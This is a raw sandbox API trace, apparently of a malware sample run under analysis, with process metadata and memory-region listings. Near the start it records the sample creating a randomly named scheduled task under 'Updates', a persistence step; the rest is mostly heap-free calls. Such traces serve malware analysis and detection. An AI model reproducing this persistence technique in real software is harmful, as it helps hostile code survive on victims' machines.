[0154.872] __iob_func () returned 0x754b2900
[0154.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0154.872] lstrlenW (lpString="SUCCESS: The scheduled task \"Updates\\nFxIoujoILCO\" has successfully been created.\n") returned 82
[0154.872] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xdc9c0*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0xdc950, lpReserved=0x0 | out: lpBuffer=0xdc9c0*, lpNumberOfCharsWritten=0xdc950*=0x52) returned 1
[0154.875] IUnknown:Release (This=0x473f38) returned 0x0
[0154.875] TaskScheduler:IUnknown:Release (This=0x473ea8) returned 0x0
[0154.875] TaskScheduler:IUnknown:Release (This=0x473e40) returned 0x1
[0154.875] lstrlenW (lpString="") returned 0
[0154.875] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp") returned 49
[0154.875] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50
[0154.875] GetProcessHeap () returned 0x280000
[0154.875] GetProcessHeap () returned 0x280000
[0154.875] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296ac8) returned 1
[0154.875] GetProcessHeap () returned 0x280000
[0154.875] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296ac8) returned 0x1fc
[0154.876] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296ac8 | out: hHeap=0x280000) returned 1
[0154.876] GetProcessHeap () returned 0x280000
[0154.876] GetProcessHeap () returned 0x280000
[0154.876] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58) returned 1
[0154.876] GetProcessHeap () returned 0x280000
[0154.876] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296a58) returned 0x64
[0154.877] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58 | out: hHeap=0x280000) returned 1
[0154.877] GetProcessHeap () returned 0x280000
[0154.877] GetProcessHeap () returned 0x280000
[0154.877] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953c0) returned 1
[0154.877] GetProcessHeap () returned 0x280000
[0154.878] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953c0) returned 0x16
[0154.878] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953c0 | out: hHeap=0x280000) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x28f0a0) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x28f0a0) returned 0x10
[0154.878] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x28f0a0 | out: hHeap=0x280000) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953e0) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953e0) returned 0x14
[0154.878] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953e0 | out: hHeap=0x280000) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2966b8) returned 1
[0154.878] GetProcessHeap () returned 0x280000
[0154.878] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2966b8) returned 0xa0
[0154.879] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2966b8 | out: hHeap=0x280000) returned 1
[0154.879] GetProcessHeap () returned 0x280000
[0154.879] GetProcessHeap () returned 0x280000
[0154.879] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294cb0) returned 1
[0154.880] GetProcessHeap () returned 0x280000
[0154.880] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294cb0) returned 0x10
[0154.880] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294cb0 | out: hHeap=0x280000) returned 1
[0154.880] GetProcessHeap () returned 0x280000
[0154.880] GetProcessHeap () returned 0x280000
[0154.880] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2952c0) returned 1
[0154.880] GetProcessHeap () returned 0x280000
[0154.880] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2952c0) returned 0x14
[0154.880] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2952c0 | out: hHeap=0x280000) returned 1
[0154.880] GetProcessHeap () returned 0x280000
[0154.881] GetProcessHeap () returned 0x280000
[0154.881] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2969e8) returned 1
[0154.881] GetProcessHeap () returned 0x280000
[0154.881] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2969e8) returned 0x68
[0154.882] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2969e8 | out: hHeap=0x280000) returned 1
[0154.882] GetProcessHeap () returned 0x280000
[0154.882] GetProcessHeap () returned 0x280000
[0154.882] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294d58) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294d58) returned 0x10
[0154.883] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294d58 | out: hHeap=0x280000) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295280) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295280) returned 0x14
[0154.883] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295280 | out: hHeap=0x280000) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294d40) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294d40) returned 0xc
[0154.883] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294d40 | out: hHeap=0x280000) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294d28) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294d28) returned 0x10
[0154.883] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294d28 | out: hHeap=0x280000) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] GetProcessHeap () returned 0x280000
[0154.883] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295260) returned 1
[0154.883] GetProcessHeap () returned 0x280000
[0154.884] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295260) returned 0x14
[0154.884] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295260 | out: hHeap=0x280000) returned 1
[0154.884] GetProcessHeap () returned 0x280000
[0154.884] GetProcessHeap () returned 0x280000
[0154.884] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295ac8) returned 1
[0154.884] GetProcessHeap () returned 0x280000
[0154.884] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295ac8) returned 0x208
[0154.885] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295ac8 | out: hHeap=0x280000) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294c50) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294c50) returned 0x10
[0154.885] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294c50 | out: hHeap=0x280000) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295220) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295220) returned 0x14
[0154.885] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295220 | out: hHeap=0x280000) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296760) returned 1
[0154.885] GetProcessHeap () returned 0x280000
[0154.885] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296760) returned 0x200
[0154.887] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296760 | out: hHeap=0x280000) returned 1
[0154.887] GetProcessHeap () returned 0x280000
[0154.887] GetProcessHeap () returned 0x280000
[0154.887] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294cc8) returned 1
[0154.887] GetProcessHeap () returned 0x280000
[0154.887] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294cc8) returned 0x10
[0154.887] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294cc8 | out: hHeap=0x280000) returned 1
[0154.887] GetProcessHeap () returned 0x280000
[0154.887] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2951c0) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2951c0) returned 0x14
[0154.888] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2951c0 | out: hHeap=0x280000) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295340) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295340) returned 0x14
[0154.888] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295340 | out: hHeap=0x280000) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294d10) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294d10) returned 0x10
[0154.888] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294d10 | out: hHeap=0x280000) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295128) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295128) returned 0x14
[0154.888] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295128 | out: hHeap=0x280000) returned 1
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] GetProcessHeap () returned 0x280000
[0154.888] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295380) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295380) returned 0x16
[0154.889] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295380 | out: hHeap=0x280000) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294ce0) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294ce0) returned 0x10
[0154.889] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294ce0 | out: hHeap=0x280000) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295108) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295108) returned 0x14
[0154.889] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295108 | out: hHeap=0x280000) returned 1
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] GetProcessHeap () returned 0x280000
[0154.889] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294fd8) returned 1
[0154.890] GetProcessHeap () returned 0x280000
[0154.890] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294fd8) returned 0x2
[0154.890] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294fd8 | out: hHeap=0x280000) returned 1
[0154.890] GetProcessHeap () returned 0x280000
[0154.891] GetProcessHeap () returned 0x280000
[0154.891] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294fe8) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294fe8) returned 0x14
[0154.892] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294fe8 | out: hHeap=0x280000) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295008) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295008) returned 0x14
[0154.892] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295008 | out: hHeap=0x280000) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295028) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295028) returned 0x14
[0154.892] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295028 | out: hHeap=0x280000) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] GetProcessHeap () returned 0x280000
[0154.892] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295048) returned 1
[0154.892] GetProcessHeap () returned 0x280000
[0154.893] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295048) returned 0x14
[0154.893] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295048 | out: hHeap=0x280000) returned 1
[0154.894] GetProcessHeap () returned 0x280000
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2952e0) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2952e0) returned 0x14
[0154.895] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2952e0 | out: hHeap=0x280000) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295300) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295300) returned 0x14
[0154.895] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295300 | out: hHeap=0x280000) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x296968) returned 1
[0154.895] GetProcessHeap () returned 0x280000
[0154.895] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x296968) returned 0x30
[0154.897] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296968 | out: hHeap=0x280000) returned 1
[0154.897] GetProcessHeap () returned 0x280000
[0154.897] GetProcessHeap () returned 0x280000
[0154.897] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295320) returned 1
[0154.898] GetProcessHeap () returned 0x280000
[0154.898] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295320) returned 0x14
[0154.898] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295320 | out: hHeap=0x280000) returned 1
[0154.898] GetProcessHeap () returned 0x280000
[0154.898] GetProcessHeap () returned 0x280000
[0154.898] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2969a0) returned 1
[0154.898] GetProcessHeap () returned 0x280000
[0154.898] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2969a0) returned 0x30
[0154.899] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2969a0 | out: hHeap=0x280000) returned 1
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2953a0) returned 1
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2953a0) returned 0x14
[0154.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2953a0 | out: hHeap=0x280000) returned 1
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] GetProcessHeap () returned 0x280000
[0154.934] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2a47c0) returned 1
[0154.934] GetProcessHeap () returned 0x280000
[0154.935] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2a47c0) returned 0x82
[0154.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2a47c0 | out: hHeap=0x280000) returned 1
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295780) returned 1
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295780) returned 0x14
[0154.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295780 | out: hHeap=0x280000) returned 1
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] GetProcessHeap () returned 0x280000
[0154.935] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294c08) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294c08) returned 0x10
[0154.936] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294c08 | out: hHeap=0x280000) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295068) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295068) returned 0x14
[0154.936] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295068 | out: hHeap=0x280000) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295088) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295088) returned 0x14
[0154.936] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295088 | out: hHeap=0x280000) returned 1
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] GetProcessHeap () returned 0x280000
[0154.936] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2950a8) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2950a8) returned 0x14
[0154.937] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2950a8 | out: hHeap=0x280000) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2950c8) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2950c8) returned 0x14
[0154.937] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2950c8 | out: hHeap=0x280000) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294c20) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294c20) returned 0x10
[0154.937] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294c20 | out: hHeap=0x280000) returned 1
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] GetProcessHeap () returned 0x280000
[0154.937] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2950e8) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2950e8) returned 0x14
[0154.938] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2950e8 | out: hHeap=0x280000) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295160) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295160) returned 0x14
[0154.938] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295160 | out: hHeap=0x280000) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2951a0) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2951a0) returned 0x14
[0154.938] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2951a0 | out: hHeap=0x280000) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] GetProcessHeap () returned 0x280000
[0154.938] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2951e0) returned 1
[0154.938] GetProcessHeap () returned 0x280000
[0154.939] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2951e0) returned 0x14
[0154.939] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2951e0 | out: hHeap=0x280000) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295200) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295200) returned 0x14
[0154.939] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295200 | out: hHeap=0x280000) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2952a0) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2952a0) returned 0x14
[0154.939] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2952a0 | out: hHeap=0x280000) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294c38) returned 1
[0154.939] GetProcessHeap () returned 0x280000
[0154.939] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294c38) returned 0x10
[0154.940] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294c38 | out: hHeap=0x280000) returned 1
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295180) returned 1
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295180) returned 0x14
[0154.940] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295180 | out: hHeap=0x280000) returned 1
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x294bf0) returned 1
[0154.940] GetProcessHeap () returned 0x280000
[0154.940] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x294bf0) returned 0x10
[0154.940] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294bf0 | out: hHeap=0x280000) returned 1
[0154.940] exit (_Code=0)
Thread:
id = 13
os_tid = 0x4a8
Process:
id = "4"
image_name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
filename = "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
page_root = "0x3b954000"
os_pid = "0x830"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xf60"
cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1661
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1662
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1663
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1664
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1665
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1666
start_va = 0x100000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1667
start_va = 0x190000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1668
start_va = 0x1370000
end_va = 0x1439fff
monitored = 1
entry_point = 0x1434c4e
region_type = mapped_file
name = "fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"
